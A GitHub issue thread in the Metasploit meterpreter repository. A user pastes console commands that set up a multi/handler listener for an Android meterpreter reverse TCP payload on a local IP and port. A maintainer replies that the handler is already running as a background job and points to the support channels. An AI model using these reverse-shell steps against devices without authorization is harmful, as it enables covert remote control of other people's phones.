rapid7/meterpreter

pleas need help guys !!

ramzios25 opened this issue · 5 comments

what i got when i try android payload

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST 192.168.1.6 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Wildcard Target

msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.6:4444
msf exploit(handler) >

ps:
this what i got the probleme
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.6:4444
msf exploit(handler) >
im using ip internal not with forwarding port

wvu commented

What are you asking?

meterpreter cant start its stop right here
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.6:4444

wvu commented

It's running as a background job. It's fine.

wvu commented

We rolled this functionality back. You should update. Also, this is not the right repo for this (support) issue.

wvu commented

If you have a support question, please ask on IRC (https://metasploit.help.rapid7.com/docs/joining-the-metasploit-irc-channel) or Slack (http://r-7.co/metaSlack).